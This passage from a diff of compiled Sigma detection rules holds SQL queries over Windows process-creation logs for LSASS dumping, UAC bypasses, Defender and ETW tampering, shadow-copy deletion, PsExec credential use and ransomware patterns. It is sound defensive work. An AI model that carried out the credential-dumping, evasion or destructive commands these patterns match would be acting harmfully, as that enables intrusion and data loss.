"Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": 
"proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": 
"proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - 
"author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, 
PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from 
a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": 
"5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata 
characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + 